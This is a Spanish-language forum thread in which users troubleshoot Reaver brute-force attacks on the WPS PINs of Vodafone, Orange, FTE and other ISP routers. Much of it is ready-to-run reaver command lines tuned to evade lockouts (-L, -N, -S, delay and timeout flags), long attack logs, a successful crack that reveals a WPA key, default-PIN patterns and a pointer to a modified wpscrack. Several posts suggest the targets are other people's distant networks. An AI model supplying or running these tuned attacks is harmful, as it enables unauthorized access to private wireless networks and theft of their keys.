Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: scragg en Noviembre 11, 2012, 12:05:10 pm
@scragg

http://code.google.com/p/reaver-wps/downloads/list?can=1&q=

Musho musho no has buscao ;)

Un saludo
Coeman76, si que he buscado, jaja.
el reaver 1.3 lo tengo descargado, pero no puedo instalarlo en linux, porque me me falta una libreria llamada sqlib3.

Mas bien buscaba una aplicacion linux, donde ya estuviera instalado el reaver 1.3.
En la aplicacion que yo crei que estaba instalada, han devido de actualizarla a la 1.4.
No obstante, haciendo pruebas, he visto que poniendo los 4 primero digitos que han proporcionado en el foro de la mac 8c:0c:a3 pin: 9360xxxx, he visto que ha empezado por el 90% y ha ido testeando de 7 pines en 7 pines hasta llegar al 93609982, y ahi se ha vuelto a quedar en el 99,99%. Esto lo he hecho con el reaver 1.4, dado que no encuentro una aplicacion linux que contenga la version 1.3 de reaver.

un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: eufra en Noviembre 11, 2012, 12:16:40 pm
Alguno sabria porque en las macs 8c:0c:a3 y d0:ae:ec en el ataque que hago va repitiendo los pin dos veces creeis que esta haciendo bien el ataque o que esta hay a lo tonto y no sacara nada utilizo xiaopan 0.4.2 y he utilizado otras versiones anteriores y hace lo mismo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Noviembre 11, 2012, 13:05:37 pm
A que te refieres que siempre te da 12345670

Mejor pon una captura de lo que te sale

Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: eufra en Noviembre 11, 2012, 15:38:55 pm
Aqui va la captura de lo que me sucede con la red.

(http://i48.tinypic.com/1zy9flv.png)

va repitiendo los pins dos veces.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 11, 2012, 15:57:06 pm
Si usas -vv entiendes mejor lo que pasa...
Coeman76, si que he buscado, jaja.
el reaver 1.3 lo tengo descargado, pero no puedo instalarlo en linux, porque me me falta una libreria llamada sqlib3.

Mas bien buscaba una aplicacion linux, donde ya estuviera instalado el reaver 1.3.
En la aplicacion que yo crei que estaba instalada, han devido de actualizarla a la 1.4.
No obstante, haciendo pruebas, he visto que poniendo los 4 primero digitos que han proporcionado en el foro de la mac 8c:0c:a3 pin: 9360xxxx, he visto que ha empezado por el 90% y ha ido testeando de 7 pines en 7 pines hasta llegar al 93609982, y ahi se ha vuelto a quedar en el 99,99%. Esto lo he hecho con el reaver 1.4, dado que no encuentro una aplicacion linux que contenga la version 1.3 de reaver.

un saludo

squilib no es  ;)
mirra bien los puntos 5 y 6 de este tema
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Noviembre 11, 2012, 19:56:33 pm
Aqui va la captura de lo que me sucede con la red.

(http://i48.tinypic.com/1zy9flv.png)

va repitiendo los pins dos veces.

Eso también me pasa a mi y unas veces te toca el bingo y otras no de momento yo lo veo bien para bingo te puede tardar 5horas como 3 días según el equipo que tengas y lo lejos que este la señal
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: eufra en Noviembre 11, 2012, 20:22:31 pm
pues na pensaba que me sucedia a mi solo lo seguire intentando y a esperar toca haber si sacamos algo en claro.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: scragg en Noviembre 11, 2012, 21:49:08 pm
Estas macs son un hueso duro de roer.

A mi, tambien me repite dos veces el mismo pin, y siempre se me queda en el 99%.
Intentare instalar el rever 1.3, pero me da que voy a estar en las mismas.

Estaremos atentos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 12, 2012, 09:30:59 am
Esto pasa al atacar redes ajenas y lejanas...  ::)
próximas preguntas del palo directo a la papelera,
¿De acuerdo Eufra?
Y por favor lee un poco antes de venir hacer preguntas ya hecha miles de veces, se llama desviar/contaminar el topic, porque para preguntar si ha nadie le ha pasado no procesar un PIN correctamente con reaver es para flipar en colores.
Si no haces ninguno esfuerzo para leer y hacer pruebas como debido yo no haré ninguno para que tus respuestas se quedan en el hilo y no vayan directo a la papelera.


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: chungalex en Noviembre 15, 2012, 22:06:39 pm
kcdtv al final parece que es viable la hipotesis que planteo en mi respuesta 329 respecto a que los routers 8c:0c:a3 no traen por defecto un cheksum valido para reaver. :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 16, 2012, 12:49:15 pm
En efecto, tengo "bajo los ojos" datos de Weiot que lo confirman.  ;)
Faltan ahora más datos para averiguar (si se puede) en función de que un ASL-25666 admite/esta configurado por defecto con un PIN no conforme.
Gracias al compi weiot tenemos ahora elementos para aclarar en parte este asunto (confirmando tu intuición  ;) ) y un wpscrack modificado para estos casos >
wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ARON en Noviembre 24, 2012, 00:22:00 am
Hola me gustaria saber si mi router de vodafone con esta mac 64:16:F0 es vulnerable a un ataque de reaver de estos routers que se sabe saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 24, 2012, 02:10:48 am
Los huawei si,
Estos no lo se, no me parece haber visto que si...
repasa el hilo dónde cada uno va poniendo los routeurs afectados que ha personalmente "dereaveado"  8)
Patrones de PINs para WPA
Que no este no significa que no se pueda atacar, lo mejor es sin duda hacer la prueba  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 8carlos88 en Diciembre 11, 2012, 22:28:15 pm
hola

con el pin q me los programas de maripuri y betis-jesus (el mismo) no consigo conectarme atraves de pin lo he probado con la alfa 1w y con 2w(con los drivers) y tb con linux inflator, etc y como mucho llega a enviar el m1 y m2 y de hay no pasa y a veces da el fallo de wps failed....(0x02)....es de vodafone y de los soportados por los programas....si me ha bloqueado el router cuanto tarda en desbloquearse, señal tengo con la alfa entre 60 y 80% medido con la alfa y el programa de betis-jesus.

un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mau5estr en Diciembre 12, 2012, 15:00:31 pm
hola

con el pin q me los programas de maripuri y betis-jesus (el mismo) no consigo conectarme atraves de pin lo he probado con la alfa 1w y con 2w(con los drivers) y tb con linux inflator, etc y como mucho llega a enviar el m1 y m2 y de hay no pasa y a veces da el fallo de wps failed....(0x02)....es de vodafone y de los soportados por los programas....si me ha bloqueado el router cuanto tarda en desbloquearse, señal tengo con la alfa entre 60 y 80% medido con la alfa y el programa de betis-jesus.

un saludo

Me pasa exactamente igual con una vodafone con buena señal.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Diciembre 12, 2012, 17:19:44 pm
lo de siempre, no podemos adivinar que pasa en vuestra casa, necesitamos detalles, datos.

1>copiado-pegado de lo que pasa en consola reaver
2>copiado pegado de airodump-ng con filtro bssid y canal


Tener el PIN por defecto no va hacer que funcione reaver mejor.  ;)

en buenas condiciones

Código: [Seleccionar]
kcdtv@noname4u:~$ sudo reaver -i mon0 -b 72:C7:14: -p 3245 -T 5 -vv
[sudo] password for kcdtv:

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session? [n/Y] n
[+] Waiting for beacon from 72:C7:14:
[+] Switching mon0 to channel 8
[+] Associated with 72:C7:14: (ESSID: vodafone)
[+] Trying pin 32450002
[+] Key cracked in 5 seconds
[+] WPS PIN: '3245'
[+] WPA PSK: 'LKYZ'
[+] AP SSID: 'vodafone'
[+] Nothing done, nothing to save.
kcdtv@noname4u:~$

en malas condiciones

Código: [Seleccionar]
sudo reaver -i mon0 -b 72:C7:14 -p 3245 -T 5 -vv
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session? [n/Y] n
[+] Waiting for beacon from 72:C7:
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Associated with 72:C7:14: (ESSID: vodafone
[+] Trying pin 3245
[+] Trying pin 3245
[+] Trying pin 3245
[+] Trying pin 3245
[+] Trying pin 3245
[+] Trying pin 3245
[+] Trying pin 3245
[+] Trying pin 3245
^C
 

20 centímetros de diferencia, grandes consecuencias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivigo en Enero 02, 2013, 21:35:31 pm
Sending WSC NACK




se me planta en el 90%, cambia de pin constantemente da ese error constantemente y llega al 99% como en el ejemplo y ahi si repite el pin pero nunka llega al 100%.use todas las opciones del comando reaver pero nada.no se ke probar ni ke hacer... :-\

Enero 02, 2013, 21:46:47 pm
por cierto la red es FTE-xxxx y con mac bc:76:70 y uso un chipset Ralink RT2870/3070
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 02, 2013, 21:59:56 pm
La primera mitad de PIN parece ser buena... ahora ojo y verifica que no tengas una mitad de PIN procesada cómo buena y que no lo es (deberías encontrar en tu consola un mensaje de error repetido varias veces acerca de ello si es así) 

Si la primera  mitad es buena, entonces intentaría aumentar el delay entre M5 y M7, con el comando -T y un valor de 10 para empezar
Y aumentaría el tiempo para el time out poniendo el doble (-t 20)
me quedaría algo así
Código: [Seleccionar]
(sudo) reaver -i mon0 -b 00:11:22:33:44:55 -p  12349982 -T 10 -t 20 -vv
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivigo en Enero 02, 2013, 22:41:22 pm
nada...probe el comando ese y sigue el mismo error repetido todo el tiempo.
asike como tu bien dices sera fallo de la primera mitad.por lo ke se mirando el archivo .wpc de /usr/local/etc/reaver/ hay manera de saber si la primera parte del pin es correcta.De echo lo hice y me da esa (1234) pero el error ese no hay manera...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 02, 2013, 22:56:13 pm
si el mensage es este
Código: [Seleccionar]
[!] WARNING: Receive timeout occurredhaz con -T 20 y  -t 50 y ponle también  -d 20
Código: [Seleccionar]
(sudo) reaver -i mon0 -b 00:11:22:33:44:55 -p  12349982 -T 20 -t 50 -d 20 -vv
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivigo en Enero 03, 2013, 12:04:26 pm
kcdtv use tu comando.Me daba el error 0x03 y poniendo la opcion -N (no nacked) lo solucione.pero lo ke no pude salvar es el mismo error de antes.con el aumento de segundos lo unico es ke tarda mas en salir el Receive timeout occurred.yo de verdad ke no se ya ni ke hacer ni ke probar,porke por lo ke decis este tipo de redes es relativamente asequible para conseguir el objetivo.Ademas comprobe por wireshark y kon iw wlan0 scan si tenia wps y obviamente si... :'(
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 03, 2013, 16:31:16 pm
Estas muy que muy cerca....
En este hilo de crack-wifi.com Xeromidas nos da este comando reaver que le ha proporcionado buenos resultados con routeurs "difíciles" 
Código: [Seleccionar]
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: david020573 en Enero 03, 2013, 17:55:12 pm
Me han pasado varios pin de 50:7E:5D y no entran ni a tiros ,cada uno pin diferent. se asocia y luego a la calle "warning 25 successive start failures" "trying pin ########" y vuelta a empezar.!!!estan muy duras!!!!  Alguna opcion para que prueve pins??? llevo 24 h. dandole palos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 03, 2013, 18:04:01 pm
Moví tu mensaje porque los problemas acerca de reaver se tratan en el subforo linux, no en un hilo sobre patrones WPA puesto en el foro windows  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivigo en Enero 03, 2013, 22:48:17 pm
kcdtv kreo ke estoy perdiendo la fe en linux... :-[ te envie por privado un ejemplo de lo ke me sale ahora.desde el timeout hast el error 0x02... :'(
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 03, 2013, 22:56:52 pm
Esta bien perder la fe; hace que uno se hace las buenas preguntas    :P
En lugar de mandar me un privado ponlo aquí, pero no todo... los mensajes críticos y el comando que empleas  ;)
de hecho no he recibido nada y creo que es porque todo es demasiado peso  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivigo en Enero 03, 2013, 23:01:12 pm
###Este_mensaje_y_usuario_seran_eliminados### ~ # reaver -i mon0 -c 6 -b bc:76:70:xx:xx:xx -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360

Código: [Seleccionar]
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from BC:76:70::xx:xx:xx
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[+] Associated with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12340002
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12342228
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 12343331
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx(ESSID: FTE-5C3E)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12343331
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx(ESSID: FTE-5C3E)
[!] WARNING: Failed to associate with BC:76:70::xx:xx:xx (ESSID: FTE-5C3E)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message

y los errores saliendo sucesivamente
era por no cargar el foro con todos mis problemas... ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 03, 2013, 23:09:58 pm
ivigo

Dos cosas: 

a) Existe una etiqueta para insertar código, es esta (úsala):

[img width=51 height=51]http://img92.xooimage.com/files/e/7/8/captura-3ada2a9.jpg[/img]

b) Lee las normas
Citar
Leete las NORMAS antes de preguntar ¿Por que?

El siguiente va directo a la papelera.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 03, 2013, 23:20:18 pm
le cuesta pero parece que estas adelantando ¿no?
Estas conectado a la red mientras haces el ataque?
(si es esto de ahí viene el problema  ;) )
¿Hay trafico? (otros clientes asociados; si es así es un problema)
¿Cual es tu nivel de PWR y RXQ si abres airodump-ng fijándote con filtro bssid y canal en el objetivo?

Citar
era por no cargar el foro con todos mis problemas...

...¿Y te parece mejor cargarme a mi sólito con todos tus problemas  ?   ;D
4 ojos ven mejor que 2 y cuando son cienes/miles es aún mejor  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Enero 03, 2013, 23:44:15 pm
Buenas

Ivigo

Has probado a cambiar de adaptador?,a mi hay adaptadores que me han dado ese error y cambiando de adaptador se ha solucionado.Otra cosa,esos fallos de asociacion tambien los he subsanado acercando el adaptador al router,es decir,problema de distancia o poca potencia de adaptador o defectuoso.

Tema aparte,el problema de que se te quede reaver pillado en ese 99% es debido a que en las redes FTE-XXXX si utilizas reaver 1.4 este lanza el 12345670 como primer pin y obtiene un falso M6 quedandose con el pin 1234 como bueno y avanzando hasta llegar hasta el 99% sin obtener la key,ya que el bloque 1234 no es bueno en realidad.
El problema se soluciona utilizando reaver 1.3 y dejando que obtenga el pin por sí solo.
Este problema ya lo expuse hace tiempo aqui en este foro

No sé si eliminando el pin 12345670 como primer pin en reaver 1.4 se subsanaría el problema,no soy mucho de tocar codigo,lo que sí sé es que reaver 1.3 simplemente va probando pines aleatoriamente hasta dar con el bueno....no tira M1 y M2 como reaver 1.4,y ahí está el problema....el porqué obtiene reaver 1.4 el pin 1234 en este tipo de red como bueno?? ni idea....kcdtv podría usté mirarlo en tener un ratillo?? ;D

Un saludo a todos y feliz año
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 04, 2013, 10:57:57 am
No tengo ni idea coeman76, no se programar ni conozco C y derivados.  :P
Una buena noticia es que en la ultima revisión, la 113, accesible mediante svn, el bug con el opción -p esta corregido.
WPS reaver desde 0    Respuesta #280 y Respuesta #282
La he probado con éxito utilizando WPSPIN y atacando con el PIN por defecto contra belkin y vodafone,
Contra un HG532c essid FTE_XXXX no he podido probar.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivigo en Enero 04, 2013, 12:38:16 pm
señores mi locura esta llegando a niveles insospechados para mi...pwr esta alrededor de 65 y rxq en torno a 90-100.nadie esta conectado a dicha red.estoy probando con el reaver 1.3 pero como la suerte no se vino para mi lado pues me da el error de sqlite3 cuando he comprobado ke si esta instalada dicha libreria...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Enero 04, 2013, 12:39:31 pm
No tengo ni idea coeman76, no se programar ni conozco C y derivados.  :P

Seguro que usted conoce a alguien  :P

Una buena noticia es que en la ultima revisión, la 113, accesible mediante svn, el bug con el opción -p esta corregido.

El bug del 99% en las redes FTE-XXXX se sigue reproduciendo en la rev113 ya que el router coje como bueno el bloque 1234 y hasta nos da el M6,pero ese bloque no es correcto,el bug es ese.Solo se me ocurre eliminar 12345670 como pin de inicio y esperar a ver que ocurre,aunque creo.el problema no viene de ahí,sino en la forma de comunicarse con el router para comprobar pines,da ahi el utilizar reaver 1.3 directamente.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ivigo en Enero 04, 2013, 12:44:02 pm
lo que no entiendo es como me da el error de la libreria sqlite3 no encontrada cuando si esta instalado sqlite...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Enero 04, 2013, 12:44:54 pm
Ivigo

Tienes el power en -65 utilizando un chip 3070? ese enlace deberia mejorar,acercate al router,de lo contrario encontraras los fallos de asociacion y de timeout y ahi no hay comando que lo salve.

Por otro lado....para sqlite3 prueba con

Código: [Seleccionar]
apt-get install libsqlite3-dev


Ahora,en cuanto subsanes el error de instalacion,y tengas reaver 1.3 rulando podrias postear resultados para saber si tengo razon y la norma del falso M6 se vuelve  cumplir y con reaver 1.3 obtienes un bloque diferente a 1234??? Gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Enero 06, 2013, 11:32:56 am
Hola no se si va aki el tema es respecto a cuando utilizo los pins de las aplicaciones.Si que es verdad que muchos funcionan perfectamente.pero me gustaria saber cual puede ser el motivo de que no me devuelva la clave,me pone pin cracked in X secons,pero solo sale el pin no me devuelve la Clave PSK.Muchas gracias espero vuestras respuestas.Q sois unos genios
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Shadark en Enero 13, 2013, 21:59:17 pm
Una sencilla pregunta, pero que me ronda la cabeza últimamente.

Si en una sesión de Reaver recibo el mensaje M5 y envío el M6, ¿es seguro al 100% que los 4 primeros dígitos del PIN son correctos? Quiero decir, ¿hay alguna forma de que los paquetes estén corruptos y yo entienda que recibo el M5 sin ser así? (Aunque ya sería casualidad que cada vez que envío un PIN del estilo 1234XXXX todos estuviesen corruptos y diciéndome que 1234 es correcto). Si es seguro 100%, ¿también es cierto al 100% que los 4 dígitos restantes me van a devolver un M7? ¿O hay algún tipo de router que no envíe el M7? (Concretamente estoy hablando de las redes WLAN_XXXX con MAC 8C:0C:A3)

Ya he hablado en otro hilo de esto, pero mi duda viene a colación de si en el caso de que tenga los 4 primeros dígitos, en algún momento Reaver me garantiza que encontrará los 4 dígitos siguientes (suponiendo que pruebe las 10000 posibilidades), o si puede depender de factores como el router, si uso la opción -S u otras opciones, o del tráfico...

Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blopa en Enero 18, 2013, 18:35:18 pm
Hola buenas.

Me estoy entreteniendo con esto de las auditorias wifi,que es un mundo muy grande.

Mi pregunta es teniendo el pin de mi router,como podria pasarlo a reaver?

Un saludo y gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 18, 2013, 18:57:40 pm
Si abrimos un tema a parte para cada argumento de los tools que tenemos no vamos a tener sitio aquí  ;D
Puedes ver en consola la ayuda de un programa poniendo su nombre y "--help"
entonces  escribes
 
Código: [Seleccionar]
reaver --help y ves la ayuda, te pongo en grueso el argumento que nos interese
Citar
reaver --help

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
   -i, --interface=<wlan>          Name of the monitor-mode interface to use
   -b, --bssid=<mac>               BSSID of the target AP


Optional Arguments:
   -m, --mac=<mac>                 MAC of the host system
   -e, --essid=<ssid>              ESSID of the target AP
   -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
   -o, --out-file=<file>           Send output to a log file [stdout]
   -s, --session=<file>            Restore a previous session file
   -C, --exec=<command>            Execute the supplied command upon successful pin recovery
   -D, --daemonize                 Daemonize reaver
   -a, --auto                      Auto detect the best advanced options for the target AP
   -f, --fixed                     Disable channel hopping
   -5, --5ghz                      Use 5GHz 802.11 channels
   -v, --verbose                   Display non-critical warnings (-vv for more)
   -q, --quiet                     Only display critical messages
   -h, --help                      Show help

Advanced Options:
   -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
   -d, --delay=<seconds>           Set the delay between pin attempts [1]
   -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
   -g, --max-attempts=<num>        Quit after num pin attempts
   -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures

   -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
   -t, --timeout=<seconds>         Set the receive timeout period [5]
   -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
   -A, --no-associate              Do not associate with the AP (association must be done by another application)
   -N, --no-nacks                  Do not send NACK messages when out of order packets are received
   -S, --dh-small                  Use small DH keys to improve crack speed
   -L, --ignore-locks              Ignore locked state reported by the target AP
   -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
   -n, --nack                      Target AP always sends a NACK [Auto]
   -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
   reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

"required argument" no te los puedes saltar, todos tu comandos reaver tienen que tener -b mac_objectivo -i interface
Código: [Seleccionar]
reaver -i mon0 -b XX:XX:XX:XX:XX;XX
añadimos el argumento "-p" para indicar el valor del PIN que queremos mandar primero
Código: [Seleccionar]
reaver -i mon0 -b XX:XX:XX:XX:XX;XX -p XXXXXXXX
añadimos -vv (opción "verbose") para tener en consola la máxima información posible.
Código: [Seleccionar]
reaver -i mon0 -b XX:XX:XX:XX:XX;XX -p XXXXXXXX -vv

Y puedes añadir todos los argumentos que quieres.  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: rcoto en Enero 24, 2013, 12:51:29 pm
No se si es el sitio correcto para este comentario.
Estoy atacando una Orange-XXXX 50:7E:5D: y de aqui no pasa, no deja provar pin, lleva 24 h., en este foro lei que despues de 3 dias se desbloquea y deja provar pins ,no se que decir.

Received identity request
  • Sending identity response
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x03), re-trying last pin
  • Nothing done, nothing to save.
  • 0.00% complete @ 2013-01-18 14:56:10 (0 seconds/pin)
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x03), re-trying last pin
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x03), re-trying last pin
    [!] WARNING: 10 failed connections in a row
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
ya somos dos te pasa igual q ami estos router son duro de roer, como todos los de orange, a dia de hoy no e conseguido todavía ninguna de orange
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: beinha en Enero 24, 2013, 13:19:56 pm
Hola. soy nueva en este mundillo y he visto que ha salido esta herramienta que vulnera la seguridad de las vodafone yo tengo una y en mi ignorancia puedo decir que a mi router con  bssid 64:16:F0... no le afecta el reaver 1.4. Lo he probado y aun que le pongas el pin que te proporciona el wpspin o cualquier otro intenta el mismo seguido y no pasa de ahi. Mi duda reside en saber si hay alguna modificación del reaver u otra aplicación que haga vulnerable mi router mediante este tipo de ataque. Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Enero 24, 2013, 14:03:53 pm
beinha, para temas de linux subforo de linux..  ¿de acuerdo?    Lo muevo allí, para la próxima presta mas atención a la hora de postear.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: david020573 en Enero 24, 2013, 14:50:13 pm
Estos router tienen un bloqueo que no deja provar pines, creo que poniendole el pin de la pegatina te lo da todo , ahora voy a provar esto:      Reaver PRO Reaver-WPS LiveDVD Edition ,  supongo que tampoco,  pero por provar....
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: samuel20112020 en Enero 24, 2013, 20:38:47 pm
hola compañeros
tengo un router livebox con mac 00:19:70:xx:xx:xx
pin por defecto 12345670
y viene activado wps por defecto
resulta cuando hago comprbacion para sacar mi key m salta eso :
warning:detected AP rate limting ,waiting60 second before re-checking
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Enero 24, 2013, 21:29:37 pm
hola compañeros
